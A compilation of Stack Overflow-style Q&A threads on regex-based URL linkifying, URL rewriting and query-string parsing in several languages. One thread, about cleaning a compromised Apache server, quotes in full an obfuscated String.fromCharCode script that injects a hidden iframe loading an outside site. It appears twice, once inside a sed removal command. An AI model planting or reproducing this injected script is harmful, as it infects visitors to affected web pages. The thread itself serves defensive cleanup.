How do I linkify text using ActionScript 3 - regex

I have a text that I want to linkify (identify URLs and convert them to HTML links). The text could be multi-line, and could contain multiple urls like the example below.
My current actionscript code looks like this
<mx:Script>
<![CDATA[
import mx.controls.Alert;
import mx.rpc.events.FaultEvent;
import mx.rpc.events.ResultEvent;
private function init():void {
var str:String = "#stack the website for google is http://www.google.com and gmail is http://gmail.com";
//Alert.show(linkify(str),"Error");
txtStatus.htmlText = linkify(str);
}
private function linkify(texty:String):String {
//return texty.replace("/[A-Za-z]+:\/\/[A-Za-z0-9-_]+\.[A-Za-z0-9-_:%&\?\/.=]+/g",function(m):String { return m.linkify(m);});
//return texty.replace(/[A-Za-z]+:\/\/[A-Za-z0-9-_]+\.[A-Za-z0-9-_:%&\?\/.=]+/g, function(m):String {return m.linkify(m);}).replace(/(^|[^\w])(#[\d\w\-]+)/g, function(m2):String{return '#' + m2.substr(1) + ''; });
var pattern:RegExp = /[A-Za-z]+:\/\/[A-Za-z0-9-_]+\.[A-Za-z0-9-_:%&\?\/.=]+/g;
var match:String = pattern.exec(texty);
return texty.replace(pattern,'<a href="' + match + '">' +
match + '</a>');
}
]]>
</mx:Script>
The problem with the above script is that it recognizes the first match and uses that across. Also how do i do it for #?
Any help is highly appreciated.

ooph ... why does everybody use regex these days, to accomplish super simple tasks? also, you forgot, that "+" is a valid character for URLs, as a replacement for space, and even an awful lot of other characters may be used, so your pattern would not even match accordingly ...
well, anyway, have a look at AS3 regex metacharacters ...
that'll GREATLY improve your expression's readability and is much more robust...
i'd go with something like this, really:
var r:RegExp = /(?:http|https):\/\/\S*/g;
trace(str.replace(r, function (s:String,...rest):String {
return '' + s + ''
} ));
but the actual point, was the global flag ...
good luck then ... :)
greetz
back2dos

Related

Angular2 pipe regex url detection

I would like to have a pipe which is detecting any url in a string and creating a link with it. At the moment I created this, which seems not working:
#Pipe({name:'matchUrl'})
export class MatchUrlPipe implements PipeTransform {
transform(value: string, arg?: any): any {
var exp = /https?:\/\/(www\.)?[-a-zA-Z0-9#:%._\+~#=]{2,256}\.[a-z]{2,4}\b([-a-zA-Z0-9#:%_\+.~#?&//=]*)/g;
return value.replace(exp, "<a href='$1'>$1</a>");
}
}
How can I fix it?
Seems like there are two problems with your implementation:
Your regex has the first capturing group ( $1 ) matching the 'www' part of the url. You want to change the regex like this for it to work (note the extra pair of parethesis at the start and end of the regex):
var exp = /(https?:\/\/(www\.)?[-a-zA-Z0-9#:%._\+~#=]{2,256}\.[a-z]{2,4}\b([-a-zA-Z0-9#:%_\+.~#?&//=]*))/g;
Pipes can't render html normally. You need a trick to do that as mentioned in other questione like this. You need to assign your 'piped value' to the attribute outerHTML of a span for example (the span will not be rendered).
Plunker example

passing HTML to template in Meteor

I'm making my first Meteor app - a regular expression matcher is the first component that I'm making. It will highlight matching items in an editable string by surrounding the matches with a span tag.
I figured out how to create the tags around matches in vanilla JavaScript:
http://jsbin.com/iXUVUJA/1/
But the way I added it into a Meteor template, the tags are being shown in the browser. Is there a way to have the tags read as html in the browser?
Here is the relevant code from my .js file:
var str = "There are thousands and thousands of uses for corn... All of which I will tell you about right now.";
var regEx = /[A-Z]/g;
if (Meteor.isClient) {
Template.sampleText.someText = function() {
return str.replace(regEx, ("span class='highlighted'>" + "$&" + "</span>") );
};
}
And here is the relevant code from my .html file:
<template name="sampleText">
{{someText}}
</template>
This is the output on the page from the server:
span class='highlighted'>There are thousands and thousands of uses for corn... span class='highlighted'>All of which span class='highlighted'>I will tell you about right now.
You can use Handlebars.SafeString, as seen in the Handlebars documentation. In your case you can do:
if (Meteor.isClient) {
Template.sampleText.someText = function() {
var element = str.replace(regEx, ("span class='highlighted'>" + "$&" + "</span>") );
return new Handlebars.SafeString(element);
};
}

sed multiline replace HTML with javascript malicious code

I've a apache server that has been infected with pieces of malicious javascript code to infect the computers that visit the web page.
What i'm trying to do is remove these pieces of malicious code using find and sed commands in a Linux server.
I have created a regular expression for sed that match almost everything but the "" end tag. It is in a new line and I can't find the way to match it as well.
The malicious code is:
<script>if (i5463 == null) { var i5463 = 1; var vst = String.fromCharCode(68)+String.fromCharCode(111)+String.fromCharCode(110)+String.fromCharCode(101); window.status=vst; document.write(String.fromCharCode(60)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(86)+String.fromCharCode(32)+String.fromCharCode(105)+String.fromCharCode(100)+String.fromCharCode(61)+String.fromCharCode(99)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(99)+String.fromCharCode(107)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(48)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(121)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(83)+String.fromCharCode(80)+String.fromCharCode(76)+String.fromCharCode(65)+String.fromCharCode(89)+String.fromCharCode(58)+String.fromCharCode(32)+String.fromCharCode(110)+String.fromCharCode(111)+String.fromCharCode(110)+String.fromCharCode(101)+String.fromCharCode(34)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(105)+String.fromCharCode(102)+String.fromCharCode(114)+String.fromCharCode(97)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(116)+String.fromCharCode(112)+String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(48)+String.fromCharCode(46)+String.fromCharCode(119)+String.fromCharCode(101)+String.fromCharCode(98)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(97)+String.fromCharCode(116)+String.fromCharCode(97)+String.fromCharCode(110)+String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(121)+String.fromCharCode(122)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(46)+String.fromCharCode(114)+String.fromCharCode(117)+String.fromCharCode(47)+String.fromCharCode(105)+String.fromCharCode(110)+String.fromCharCode(100)+String.fromCharCode(101)+String.fromCharCode(120)+String.fromCharCode(46)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(109)+String.fromCharCode(108)+String.fromCharCode(63)+String.fromCharCode(112)+String.fromCharCode(61)+String.fromCharCode(50)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(55)+String.fromCharCode(54)+String.fromCharCode(56)+String.fromCharCode(34)+String.fromCharCode(32)+String.fromCharCode(119)+String.fromCharCode(105)+String.fromCharCode(100)+String.fromCharCode(116)+String.fromCharCode(104)+String.fromCharCode(61)+String.fromCharCode(34)+screen.width+String.fromCharCode(34)+String.fromCharCode(32)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(105)+String.fromCharCode(103)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(61)+String.fromCharCode(34)+screen.height+String.fromCharCode(34)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(105)+String.fromCharCode(102)+String.fromCharCode(114)+String.fromCharCode(97)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(86)+String.fromCharCode(62)); window.status=vst; }
</script>
Note of the writer: After creating the question, I can see that the web formatting cuts the previous sample. If you want to see the full sample of malicious javascript code, have a look at the text not bold in the next text and just add at the end of the text a "new line" and a "" html tag.
The regular expression that works for all the text but for the last "</script>" is:
**find /root/cambios -type f -exec sed -i 's#**<script>if (i5463 == null) { var i5463 = 1; var vst = String.fromCharCode(68)+String.fromCharCode(111)+String.fromCharCode(110)+String.fromCharCode(101); window.status=vst; document.write(String.fromCharCode(60)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(86)+String.fromCharCode(32)+String.fromCharCode(105)+String.fromCharCode(100)+String.fromCharCode(61)+String.fromCharCode(99)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(99)+String.fromCharCode(107)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(48)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(121)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(83)+String.fromCharCode(80)+String.fromCharCode(76)+String.fromCharCode(65)+String.fromCharCode(89)+String.fromCharCode(58)+String.fromCharCode(32)+String.fromCharCode(110)+String.fromCharCode(111)+String.fromCharCode(110)+String.fromCharCode(101)+String.fromCharCode(34)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(105)+String.fromCharCode(102)+String.fromCharCode(114)+String.fromCharCode(97)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(116)+String.fromCharCode(112)+String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(48)+String.fromCharCode(46)+String.fromCharCode(119)+String.fromCharCode(101)+String.fromCharCode(98)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(97)+String.fromCharCode(116)+String.fromCharCode(97)+String.fromCharCode(110)+String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(121)+String.fromCharCode(122)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(46)+String.fromCharCode(114)+String.fromCharCode(117)+String.fromCharCode(47)+String.fromCharCode(105)+String.fromCharCode(110)+String.fromCharCode(100)+String.fromCharCode(101)+String.fromCharCode(120)+String.fromCharCode(46)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(109)+String.fromCharCode(108)+String.fromCharCode(63)+String.fromCharCode(112)+String.fromCharCode(61)+String.fromCharCode(50)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(55)+String.fromCharCode(54)+String.fromCharCode(56)+String.fromCharCode(34)+String.fromCharCode(32)+String.fromCharCode(119)+String.fromCharCode(105)+String.fromCharCode(100)+String.fromCharCode(116)+String.fromCharCode(104)+String.fromCharCode(61)+String.fromCharCode(34)+screen.width+String.fromCharCode(34)+String.fromCharCode(32)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(105)+String.fromCharCode(103)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(61)+String.fromCharCode(34)+screen.height+String.fromCharCode(34)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(105)+String.fromCharCode(102)+String.fromCharCode(114)+String.fromCharCode(97)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(86)+String.fromCharCode(62)); window.status=vst; }**##g' {} \;**
So, please, anyone can help to match the new line and the "" text??
Thank you in advance.
Indeed you shouldn't use regex for this task. As has been told many times in SO regex are not the proper tool for dealing with HTML manipulations as it is not a regular language. Your best bet is to use an HTML parser. For instance, the following unoptimized (but still simple) code uses Jsoup for achieving your goal:
import org.jsoup.Jsoup;
import org.jsoup.nodes.DataNode;
import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;
import org.jsoup.nodes.Node;
import org.jsoup.select.Elements;
public class RemoveScript {
public static void main(String args[]){
String viralContent = "Your viral content";
String inputText = "<html><head><script>" + viralContent + "</script></head><body></body></html>";
Document doc = Jsoup.parse(inputText);
Elements scripts = doc.select("script");
for(Element element : scripts) {
for (Node child: element.childNodes()) {
if (child instanceof DataNode) {
String content = ((DataNode) child).getWholeData();
if (content.equals(viralContent)) {
element.remove();
}
}
}
}
System.out.println(doc.toString());
}
}
I'm sure other parsers can do the same very easily too.

Javascript regex replace

I have a langauge dropdown, and a javascript function which changes the page to the corresponding language selected. I need help on my regex replace:
For example, I would like this URL to turn into this url:
http://localhost:7007/en/Product/Detail/1038
http://localhost:7007/fr/Product/Detail/1038
function languageChange(sender) {
var lang = $(sender).val();
var target = window.location.href;
target = target.replace(/(http:\/\/.*?)([a-zA-Z]{2})(.*$)/gim, '$1' + lang + '$3');
window.location = target;
}
Is your URL always the same structure? If so, you may not need a regex at all. Split the url at each "/", replace index 3, then join your array back to together with "/".
Here is a code sample:
function changeLanguage(url, newLang) {
var url = url.split('/');
url[3] = newLang;
return url.join('/');
}
changeLanguage('http://localhost:7007/en/Product/Detail/1038','Fr');
Note: I originally wrote "splice" instead of "join" in my response. Join is the correct method.
Here is a function that processes any number of URLs within a string, and replaces the language part (the first part of path), only if exists and is from 2 to 4 chars long:
function changeLanguage(text, lang) {
return text.replace(
/\b(\w+:\/\/[^\/]+\/)[A-Z]{2,4}(?=[\/\s]|$)/gim,
'$1' + lang);
}
Edit: Converted to function format.
Use this regex:
target =
target.replace(/(https?:\/\/[^/]+)\/?([^/]*)(.*)/gi, '$1/' + lang + '$3');
if e.g. lang='fr' then target holds http://localhost:7007/fr/Product/Detail/1038 value;

Regex to parse querystring values to named groups

I have a HTML with the following content:
... some text ...
link ... some text ...
... some text ...
link ... some text ...
... some text ...
I would like to parse that and get a match with named groups:
match 1
group["user"]=123
group["section"]=2
match 2
group["user"]=678
group["section"]=5
I can do it if parameters always go in order, first User and then Section, but I don't know how to do it if the order is different.
Thank you!
In my case I had to parse an Url because the utility HttpUtility.ParseQueryString is not available in WP7. So, I created a extension method like this:
public static class UriExtensions
{
private static readonly Regex queryStringRegex;
static UriExtensions()
{
queryStringRegex = new Regex(#"[\?&](?<name>[^&=]+)=(?<value>[^&=]+)");
}
public static IEnumerable<KeyValuePair<string, string>> ParseQueryString(this Uri uri)
{
if (uri == null)
throw new ArgumentException("uri");
var matches = queryStringRegex.Matches(uri.OriginalString);
for (int i = 0; i < matches.Count; i++)
{
var match = matches[i];
yield return new KeyValuePair<string, string>(match.Groups["name"].Value, match.Groups["value"].Value);
}
}
}
Then It's matter of using it, for example
var uri = new Uri(HttpUtility.UrlDecode(#"file.aspx?userId=123&section=2"),UriKind.RelativeOrAbsolute);
var parameters = uri.ParseQueryString().ToDictionary( kvp => kvp.Key, kvp => kvp.Value);
var userId = parameters["userId"];
var section = parameters["section"];
NOTE: I'm returning the IEnumerable instead of the dictionary directly just because I'm assuming that there might be duplicated parameter's name. If there are duplicated names, then the dictionary will throw an exception.
Why use regex to split it out?
You could first extrct the query string. Split the result on & and then create a map by splitting the result from that on =
You didn't specify what language you are working in, but this should do the trick in C#:
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Text.RegularExpressions;
namespace RegexTest
{
class Program
{
static void Main(string[] args)
{
string subjectString = #"... some text ...
link ... some text ...
... some text ...
link ... some text ...
... some text ...";
Regex regexObj =
new Regex(#"<a href=""file.aspx\?(?:(?:userId=(?<user>.+?)&section=(?<section>.+?)"")|(?:section=(?<section>.+?)&user=(?<user>.+?)""))");
Match matchResults = regexObj.Match(subjectString);
while (matchResults.Success)
{
string user = matchResults.Groups["user"].Value;
string section = matchResults.Groups["section"].Value;
Console.WriteLine(string.Format("User = {0}, Section = {1}", user, section));
matchResults = matchResults.NextMatch();
}
Console.ReadKey();
}
}
}
Using regex to first find the key value pairs and then doing splits... doesn't seem right.
I'm interested in a complete regex solution.
Anyone?
Check this out
\<a\s+href\s*=\s*["'](?<baseUri>.+?)\?(?:(?<key>.+?)=(?<value>.+?)[&"'])*\s*\>
You can get pairs with something like Groups["key"].Captures[i] & Groups["value"].Captures[i]
Perhaps something like this (I am rusty on regex, and wasn't good at them in the first place anyway. Untested):
/href="[^?]*([?&](userId=(?<user>\d+))|section=(?<section>\d+))*"/
(By the way, the XHTML is malformed; & should be & in the attributes.)
Another approach is to put the capturing groups inside lookaheads:
Regex r = new Regex(#"<a href=""file\.aspx\?" +
#"(?=[^""<>]*?user=(?<user>\w+))" +
#"(?=[^""<>]*?section=(?<section>\w+))";
If there are only two parameters, there's no reason to prefer this way over the alternation-based approaches suggested by Mike and strager. But if you needed to match three parameters, the other regexes would grow to several times their current length, while this one would only need another lookahead like just like the two existing ones.
By the way, contrary to your response to Claus, it matters quite a bit which language you're working in. There's a huge variation in capabilities, syntax, and API from one language to the next.
You did not say which regex flavor you are using. Since your sample URL links to an .aspx file, I'll assume .NET. In .NET, a single regex can have multiple named capturing groups with the same name, and .NET will treat them as if they were one group. Thus you can use the regex
userID=(?<user>\d+)&section=(?<section>\d+)|section=(?<section>\d+)&userID=(?<user>\d+)
This simple regex with alternation will be far more efficient than any tricks with lookaround. You can easily expand it if your requirements include matching the parameters only if they're in a link.
a simple python implementation overcoming the ordering problem
In [2]: x = re.compile('(?:(userId|section)=(\d+))+')
In [3]: t = 'href="file.aspx?section=2&userId=123"'
In [4]: x.findall(t)
Out[4]: [('section', '2'), ('userId', '123')]
In [5]: t = 'href="file.aspx?userId=123&section=2"'
In [6]: x.findall(t)
Out[6]: [('userId', '123'), ('section', '2')]